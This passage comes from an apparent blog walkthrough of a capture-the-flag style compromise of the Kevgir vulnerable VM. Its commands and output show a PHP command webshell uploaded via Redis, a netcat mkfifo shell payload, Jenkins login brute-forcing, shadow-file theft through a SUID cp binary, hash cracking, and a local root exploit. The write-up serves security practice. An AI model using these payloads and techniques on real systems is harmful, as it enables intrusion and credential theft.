I check again at the website structure to find a place where to store the shell, and I try the folder ‘/var/www/html/gentleman/templates/rhuk_milkyway/images/blue/mw_box_br.png’ At this point I try to upload my webshell on the blue folder via Redis:

 
msf auxiliary(redis_server) > use auxiliary/scanner/redis/file_upload
msf auxiliary(file_upload) > show options

Module options (auxiliary/scanner/redis/file_upload):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   DISABLE_RDBCOMPRESSION  true             yes       Disable compression when saving if found to be enabled
   LocalFile                                no        Local file to be uploaded
   Password                foobared         no        Redis password for authentication test
   RHOSTS                                   yes       The target address range or CIDR identifier
   RPORT                   6379             yes       The target port
   RemoteFile                               no        Remote file path
   THREADS                 1                yes       The number of concurrent threads

I generate a shell with weevely:

# weevely generate mysh3ll ~/Desktop/workspace/pentest/kevgir/shell.php
Generated backdoor with password 'mysh3ll' in '/root/Desktop/workspace/pentest/kevgir/shell.php' of 1302 byte size.

# php -S 127.0.0.1:8080
PHP 5.6.17-3 Development Server started at Sat Mar 12 19:02:42 2016
Listening on http://127.0.0.1:8080
Document root is /root/Desktop/workspace/pentest/kevgir
Press Ctrl-C to quit.

==== ON ANOTHER TERMINAL =====
# weevely http://127.0.0.1:8080/shell.php mysh3ll

[+] weevely 3.2.0

[+] Target: 127.0.0.1:8080
[+] Session:  /root/.weevely/sessions/127.0.0.1/shell_1.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> id
uid=0(root) gid=0(root) groups=0(root)

The shell is ready, I just have to upload it somewhere.

I check in the backup folder that I’ve found to see if there’s a folder with writing permissions:

root@Karen:~/Desktop/workspace/pentest/kevgir/html# find . -perm /g=w
./dvwa/external/phpids/0.6/lib/IDS/tmp/phpids_log.txt
./dvwa/hackable/uploads
./gentleman/configuration.php
./web-standards/sites/all/modules/dragdrop_gallery
./web-standards/sites/default/files
./web-standards/sites/default/files/styles
./web-standards/sites/default/default.settings.php
./web-standards/LICENSE.txt

So I go to http://192.168.56.102/dbwa and I can see that there’s the Damn Vulnerable Web Application running. I try to upload the shell on /var/www/html/dvwa/hackable/uploads/shell.php, but it doesn’t work.

I bruteforce the login page of dvwa and I find that the username and passwords are admin:password (nice!), so I go to the PHPInfo section and I find out that the folder is actually /var/www/html/main/dvwa (nice one guys!).

So, I try to upload the shell on /var/www/html/main/dvwa/hackable/uploads/shell.php:

msf > use auxiliary/scanner/redis/file_upload
msf auxiliary(file_upload) > show options

Module options (auxiliary/scanner/redis/file_upload):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   DISABLE_RDBCOMPRESSION  true             yes       Disable compression when saving if found to be enabled
   LocalFile                                no        Local file to be uploaded
   Password                foobared         no        Redis password for authentication test
   RHOSTS                                   yes       The target address range or CIDR identifier
   RPORT                   6379             yes       The target port
   RemoteFile                               no        Remote file path
   THREADS                 1                yes       The number of concurrent threads

msf auxiliary(file_upload) > set RHOSTS 192.168.56.102
RHOSTS => 192.168.56.102
msf auxiliary(file_upload) > set RemoteFile /var/www/html/main/dvwa/hackable/uploads/shell.php
RemoteFile => /var/www/html/main/dvwa/hackable/uploads/shell.php
msf auxiliary(file_upload) > set LocalFile /root/Desktop/workspace/pentest/kevgir/shell.php
LocalFile => /root/Desktop/workspace/pentest/kevgir/shell.php
msf auxiliary(file_upload) > show options

Module options (auxiliary/scanner/redis/file_upload):

   Name                    Current Setting                                                        Required  Description
   ----                    ---------------                                                        --------  -----------
   DISABLE_RDBCOMPRESSION  true                                                                   yes       Disable compression when saving if found to be enabled
   LocalFile               /root/Desktop/workspace/pentest/kevgir/shell.php                       no        Local file to be uploaded
   Password                foobared                                                               no        Redis password for authentication test
   RHOSTS                  192.168.56.101                                                         yes       The target address range or CIDR identifier
   RPORT                   6379                                                                   yes       The target port
   RemoteFile              /var/www/html/main/dvwa/hackable/uploads/shell.php         no        Remote file path
   THREADS                 1                                                                      yes       The number of concurrent threads

msf auxiliary(file_upload) > exploit

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

==== ON ANOTHER TERMINAL =====
# weevely http://192.168.56.101:8081/dvwa/hackable/uploads/shell.php mysh3ll

[+] weevely 3.2.0

[+] Target: 192.168.56.101:8081
[+] Session:  /root/.weevely/sessions/192.168.56.101/shell_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> id
[-][channel] The remote backdoor request triggers an error 404, please verify its availability
[-][channel] The remote backdoor request triggers an error 404, please verify its availability
[-][channel] The remote backdoor request triggers an error 404, please verify its availability
[!][terminal] Backdoor communication failed: please check URL reachability and password

Unlucky, it doesn’t work. It might be for some unexpected characters. So I upload another simple webshell:

# cat simple-backdoor.php 
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->

<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

<!--    http://michaeldaw.org   2006    -->

and this time it works:

http://192.168.56.101/dvwa/hackable/uploads/shell5.php?cmd=whoami
www-data

http://192.168.56.101/dvwa/hackable/uploads/shell5.php?cmd=cat%20/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
mysql:x:102:106:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
landscape:x:104:111::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
tomcat7:x:106:114::/usr/share/tomcat7:/bin/false
user:x:1000:1000:user,,,:/home/user:/bin/bash
ftp:x:107:116:ftp daemon,,,:/srv/ftp:/bin/false
admin:x:1002:1002:,,,:/home/admin:/bin/bash
statd:x:108:65534::/var/lib/nfs:/bin/false
jenkins:x:109:117:Jenkins,,,:/var/lib/jenkins:/bin/bash

This way I’ve also found a list of users. I’m going to try to open a shell from this. I check that netcat is installed and I see that I can’t use the -e option to execute a command, but as I can see from the man of netcat:

There is no -c or -e option in this netcat, but you still can execute a
command after connection being established by redirecting file descrip-
tors. Be cautious here because opening a port and let anyone connected
execute arbitrary command on your site is DANGEROUS. If you really need
to do this, here is an example:

On 'server' side:

   $ rm -f /tmp/f; mkfifo /tmp/f
   $ cat /tmp/f | /bin/sh -i 2>&1 | nc -l 127.0.0.1 1234 > /tmp/f

On 'client' side:

   $ nc host.example.com 1234
   $ (shell prompt from host.example.com)

So I try this technique:

== ON THE BROWSER ==
http://192.168.56.101/dvwa/hackable/uploads/shell5.php?cmd=rm%20-f%20/tmp/f;%20mkfifo%20/tmp/f;%20cat%20/tmp/f%20%7c%20/bin/sh%20-i%202%3e%261%20%7c%20nc%20%2dlvp%201234%20%3e%20/tmp/f

== ON THE TERMINAL ==
# nc 192.168.56.101 1234
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ 

Shell obtained! I spawn a shell and I have a wonder around and I find all the web projects on the root folder of apache:

$ pwd
/var/www/html/main
$ ls -l
total 44
drwxr-xr-x  8 www-data www-data 4096 Feb 24 23:44 dvwa
drwxr-xr-x  7 www-data www-data 4096 Feb 25 00:07 g0yg0y
-rwxr-xr-x  1 www-data www-data  236 Feb 25 00:16 index.html
-rwxr-xr-x  1 www-data www-data 4621 Feb 24 23:44 kevgir.png
-rw-r--r--  1 www-data www-data 4516 Feb 24 23:44 logo.png
drwxr-xr-x 17 www-data www-data 4096 Feb 24 23:45 mutillidae
drwxr-xr-x  3 www-data www-data 4096 Mar 26 23:42 test
drwxr-xr-x  8 www-data www-data 4096 Feb 24 23:45 xvwa
drwxr-xr-x 11 www-data www-data 4096 Feb 24 23:45 zenphoto

I go ahead and check the port 9000, and I find out that there’s Jenkins running on it. I do some research using metasploit

msf auxiliary(joomla_bruteforce_login) > use auxiliary/scanner/http/jenkins_enum
msf auxiliary(jenkins_enum) > show options

Module options (auxiliary/scanner/http/jenkins_enum):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /jenkins/        yes       The path to the Jenkins-CI application
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host

msf auxiliary(jenkins_enum) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf auxiliary(jenkins_enum) > set RPORT 9000
RPORT => 9000
msf auxiliary(jenkins_enum) > set TARGETURI /
TARGETURI => /
msf auxiliary(jenkins_enum) > show options

Module options (auxiliary/scanner/http/jenkins_enum):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.56.101   yes       The target address range or CIDR identifier
   RPORT      9000             yes       The target port
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The path to the Jenkins-CI application
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host

msf auxiliary(jenkins_enum) > run

[*] Jenkins Version - 1.647
[*] /script restricted (403)
[*] /view/All/newJob restricted (403)
[+] /asynchPeople/ does not require authentication (200)
[*] /systemInfo restricted (403)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

I visit the page http://192.168.56.101:9000/asynchPeople/ and I see that the only users that can access are admin and anonymous. I use another metasploit auxiliary to bruteforce the logins:

msf auxiliary(jenkins_enum) > use auxiliary/scanner/http/jenkins_login
msf auxiliary(jenkins_login) > show options

Module options (auxiliary/scanner/http/jenkins_login):

   Name              Current Setting          Required  Description
   ----              ---------------          --------  -----------
   BLANK_PASSWORDS   false                    no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                        yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                    no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                    no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                    no        Add all users in the current database to the list
   HTTP_METHOD       POST                     yes       The HTTP method to use for the login (Accepted: GET, POST)
   LOGIN_URL         /j_acegi_security_check  yes       The URL that handles the login process
   PASSWORD                                   no        A specific password to authenticate with
   PASS_FILE                                  no        File containing passwords, one per line
   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                     yes       The target address range or CIDR identifier
   RPORT             8080                     yes       The target port
   SSL               false                    no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                    yes       Stop guessing when a credential works for a host
   THREADS           1                        yes       The number of concurrent threads
   USERNAME                                   no        A specific username to authenticate as
   USERPASS_FILE                              no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                    no        Try the username as the password for all users
   USER_FILE                                  no        File containing usernames, one per line
   VERBOSE           true                     yes       Whether to print output for all attempts
   VHOST                                      no        HTTP server virtual host

msf auxiliary(jenkins_login) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf auxiliary(jenkins_login) > set RPORT 9000
RPORT => 9000
msf auxiliary(jenkins_login) > set LOGIN_URL /login
LOGIN_URL => /login
msf auxiliary(jenkins_login) > set BLANK_PASSWORDS true
BLANK_PASSWORDS => true
msf auxiliary(jenkins_login) > set USER_FILE Desktop/workspace/pentest/kevgir/users.txt
USER_FILE => Desktop/workspace/pentest/kevgir/users.txt
msf auxiliary(jenkins_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
PASS_FILE => /usr/share/wordlists/rockyou.txt
msf auxiliary(jenkins_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf auxiliary(jenkins_login) > run

Nothing, so I go ahead and check stuff manually. I go to the jenkins folder and this is what I find:

$ ls -l /var/lib/jenkins   
ls -l /var/lib/jenkins
total 68
-rw-r--r--  1 jenkins jenkins 1409 Feb 13 10:42 config.xml
-rw-r--r--  1 jenkins jenkins 1567 Mar 26 18:45 Download metadata.log
-rw-r--r--  1 jenkins jenkins  159 Mar 26 18:45 hudson.model.UpdateCenter.xml
-rw-------  1 jenkins jenkins 1680 Feb  9 02:16 identity.key.enc
-rw-r--r--  1 jenkins jenkins  138 Feb 13 10:42 jenkins.model.DownloadSettings.xml
-rw-r--r--  1 jenkins jenkins  169 Feb 13 10:42 jenkins.security.QueueItemAuthenticatorConfiguration.xml
drwxr-xr-x  3 jenkins jenkins 4096 Feb 13 04:34 jobs
-rw-r--r--  1 jenkins jenkins  907 Mar 26 18:45 nodeMonitors.xml
drwxr-xr-x  2 jenkins jenkins 4096 Feb  9 02:16 nodes
drwxr-xr-x 21 jenkins jenkins 4096 Feb  9 02:16 plugins
-rw-r--r--  1 jenkins jenkins  129 Feb 25 16:58 queue.xml.bak
-rw-r--r--  1 jenkins jenkins   64 Feb  9 02:11 secret.key
-rw-r--r--  1 jenkins jenkins    0 Feb  9 02:11 secret.key.not-so-secret
drwxr-xr-x  4 jenkins jenkins 4096 Feb 13 10:38 secrets
drwxr-xr-x  2 jenkins jenkins 4096 Feb 24 23:11 updates
drwxr-xr-x  2 jenkins jenkins 4096 Feb  9 02:16 userContent
drwxr-xr-x  3 jenkins jenkins 4096 Feb 13 10:41 users
-rw-r--r--  1 jenkins jenkins   14 Mar 26 20:36 Workspace clean-up.log

So, I go to the folder ‘users’ and I find the admin user folder. Within there’s the config.xml file with information about the user and, lucky me, I find the hash of the password. It is in Blowfish, so I use John the Ripper with the Rockyou wordlist to crack the password:

$ cat /var/lib/jenkins/users/admin/config.xml            
<?xml version='1.0' encoding='UTF-8'?>
<user>
[...]
    <hudson.security.HudsonPrivateSecurityRealm_-Details>
      <passwordHash>#jbcrypt:$2a$10$iMzGIv6.PsDI.D7r73qBhuufUnzK8C517FfsjrVkLciwRWR9L3LtK</passwordHash>
    </hudson.security.HudsonPrivateSecurityRealm_-Details>
[...]
</user>


== ON ANOTHER TERMINAL ==
# john jenkins_user_hashes.txt -wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X2])
Press 'q' or Ctrl-C to abort, almost any other key for status
hello            (admin)
1g 0:00:00:03 DONE (2016-04-02 20:06) 0.3267g/s 19.60p/s 19.60c/s 19.60C/s playboy..hello
Use the "--show" option to display all of the cracked passwords reliably
Session completed

So, the password of the admin user of jenkins is hello.

I check the port 1322 and I find out that it’s a ssh service running on this port. I log in as admin with password admin and I start looking for a privilege escalation.

# ssh admin@192.168.56.101 -p 1322
                                                                  
                                                                  
  G:                ,;                                            
  E#,    :        f#i                        .Gt  t    j.         
  E#t  .GE      .E#t                        j#W:  Ej   EW,        
  E#t j#K;     i#W,     t      .DD.       ;K#f    E#,  E##j       
  E#GK#f      L#D.      EK:   ,WK.      .G#D.     E#t  E###D.     
  E##D.     :K#Wfff;    E#t  i#D       j#K;       E#t  E#jG#W;    
  E##Wi     i##WLLLLt   E#t j#f      ,K#f   ,GD;  E#t  E#t t##f   
  E#jL#D:    .E#L       E#tL#i        j#Wi   E#t  E#t  E#t  :K#E: 
  E#t ,K#j     f#E:     E#WW,          .G#D: E#t  E#t  E#KDDDD###i
  E#t   jD      ,WW;    E#K:             ,K#fK#t  E#t  E#f,t#Wi,,,
  j#t            .D#;   ED.                j###t  E#t  E#t  ;#W:  
   ,;              tt   t                   .G#t  E#t  DWi   ,KK: 
                                              ;;  ,;.             
                                                                  
                                                   by canyoupwn.me

admin@192.168.56.101's password: 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System load:  0.2               Processes:           147
  Usage of /:   32.6% of 6.50GB   Users logged in:     0
  Memory usage: 67%               IP address for eth0: 192.168.56.101
  Swap usage:   0%

admin@canyoupwnme:~$ find / -perm -u=s 2>/dev/null
/bin/umount
/bin/fusermount
/bin/ping6
/bin/mount
/bin/ping
/bin/su
/bin/cp
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/at
/usr/bin/mtr
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/chsh
/usr/bin/gpasswd
/usr/lib/pt_chown
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/authbind/helper
/usr/sbin/uuidd
/usr/sbin/pppd
/etc/init.d/dhclient
/sbin/mount.cifs
/sbin/mount.nfs
admin@canyoupwnme:~$ ls -l /bin/cp
-rwsr-xr-x 1 root root 124932 Jan 14  2015 /bin/cp

The command cp has the SUID bit set, so I can abuse this command to copy all the files that a root user can access. So, I copy the /etc/shadow file to read the content and get the root password. Since I already got the passwd file, I unshadow the files /etc/passwd and /etc/shadow on my local machine and use John the Ripper to crack the password:

$ /bin/cp /etc/shadow /tmp/shadow
admin@canyoupwnme:~$ cat !$
cat /tmp/shadow
root:$6$6ZcgUVCV$Ocsce9FUHYswcbI3UtrPNqFnkvcPOnEtstWlVSTqGYEYAYZ9aYw7tnW35uRGxb1z7ZZBZ.hoQcm/S/cg0f4uI0:16843:0:99999:7:::
daemon:*:16652:0:99999:7:::
bin:*:16652:0:99999:7:::
sys:*:16652:0:99999:7:::
sync:*:16652:0:99999:7:::
games:*:16652:0:99999:7:::
man:*:16652:0:99999:7:::
lp:*:16652:0:99999:7:::
mail:*:16652:0:99999:7:::
news:*:16652:0:99999:7:::
uucp:*:16652:0:99999:7:::
proxy:*:16652:0:99999:7:::
www-data:*:16652:0:99999:7:::
backup:*:16652:0:99999:7:::
list:*:16652:0:99999:7:::
irc:*:16652:0:99999:7:::
gnats:*:16652:0:99999:7:::
nobody:*:16652:0:99999:7:::
libuuid:!:16652:0:99999:7:::
syslog:*:16652:0:99999:7:::
mysql:!:16834:0:99999:7:::
messagebus:*:16834:0:99999:7:::
landscape:*:16834:0:99999:7:::
sshd:*:16834:0:99999:7:::
tomcat7:*:16834:0:99999:7:::
user:$6$a9pCcsxn$5xvkibMZh9RDRVuAeC6vJSR2x17t52pYtdd50/rh3TY.ZoE53GE.OcbtVdBMRKROLko.qbIqj88k5mOXjtE3q.:16834:0:99999:7:::
ftp:*:16834:0:99999:7:::
admin:$6$mf3G6MUz$/si.Yp0SgJH/D4WQRC2lyRAaFKUqeHzC3ZbL7ENrCR2lCNibr0d8V0y03JFEnymP8MZzBi3m6mvaeeUmyySve/:16834:0:99999:7:::
statd:*:16839:0:99999:7:::
jenkins:*:16840:0:99999:7:::


== ON MY LOCAL MACHINE
# # cat root_passwd.txt 
root:x:0:0:root:/root:/bin/bash

# cat root_shadow.txt
root:$6$6ZcgUVCV$Ocsce9FUHYswcbI3UtrPNqFnkvcPOnEtstWlVSTqGYEYAYZ9aYw7tnW35uRGxb1z7ZZBZ.hoQcm/S/cg0f4uI0:16843:0:99999:7:::

# unshadow root_passwd.txt root_shadow.txt 
root:$6$6ZcgUVCV$Ocsce9FUHYswcbI3UtrPNqFnkvcPOnEtstWlVSTqGYEYAYZ9aYw7tnW35uRGxb1z7ZZBZ.hoQcm/S/cg0f4uI0:0:0:root:/root:/bin/bash

# echo "root:$6$6ZcgUVCV$Ocsce9FUHYswcbI3UtrPNqFnkvcPOnEtstWlVSTqGYEYAYZ9aYw7tnW35uRGxb1z7ZZBZ.hoQcm/S/cg0f4uI0:0:0:root:/root:/bin/bash" > root_unshadowed.txt

# john -wordlist:/usr/share/wordlists/rockyou.txt root_unshadowed.txt 
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status

In the meantime I try to use an actual exploit, since the version of the victim’s box is Ubuntu 14.04.03. I took the exploit from this URL: exploit-url

admin@canyoupwnme:/tmp$ vim r00t.c
admin@canyoupwnme:/tmp$ gcc r00t.c -o r00t
admin@canyoupwnme:/tmp$ ls -l | grep r00t
-rwxrwxr-x 1 admin    admin       8031 Mar 27 07:52 r00t
-rw-rw-r-- 1 admin    admin       2704 Mar 27 07:51 r00t.c
admin@canyoupwnme:/tmp$ ./r00t 
root@canyoupwnme:/tmp# id
uid=0(root) gid=1002(admin) groups=0(root),1002(admin)
root@canyoupwnme:/tmp# cd /root
root@canyoupwnme:/root# ls -l
total 4
drwxr-xr-x 2 root root 4096 Feb 13 10:10 banner
root@canyoupwnme:/root# cd banner
root@canyoupwnme:/root/banner# ls -l
total 4
-rw-r--r-- 1 root root 1140 Feb 13 10:12 kevgir
root@canyoupwnme:/root/banner# cat kevgir 
                                                                  
                                                                  
  G:                ,;                                            
  E#,    :        f#i                        .Gt  t    j.         
  E#t  .GE      .E#t                        j#W:  Ej   EW,        
  E#t j#K;     i#W,     t      .DD.       ;K#f    E#,  E##j       
  E#GK#f      L#D.      EK:   ,WK.      .G#D.     E#t  E###D.     
  E##D.     :K#Wfff;    E#t  i#D       j#K;       E#t  E#jG#W;    
  E##Wi     i##WLLLLt   E#t j#f      ,K#f   ,GD;  E#t  E#t t##f   
  E#jL#D:    .E#L       E#tL#i        j#Wi   E#t  E#t  E#t  :K#E: 
  E#t ,K#j     f#E:     E#WW,          .G#D: E#t  E#t  E#KDDDD###i
  E#t   jD      ,WW;    E#K:             ,K#fK#t  E#t  E#f,t#Wi,,,
  j#t            .D#;   ED.                j###t  E#t  E#t  ;#W:  
   ,;              tt   t                   .G#t  E#t  DWi   ,KK: 
                                              ;;  ,;.             
                                                                  
                                                   by canyoupwn.me

The password cracking for the root password is taking too long. It appears to be a strong password (maybe not), so I will update it when it’s ready (if I find it :P).

Thanks to the team of canyoupwnme for the VM.

Conclusion

As usual, for any information or feedback, please do not hesitate to leave a comment.

./A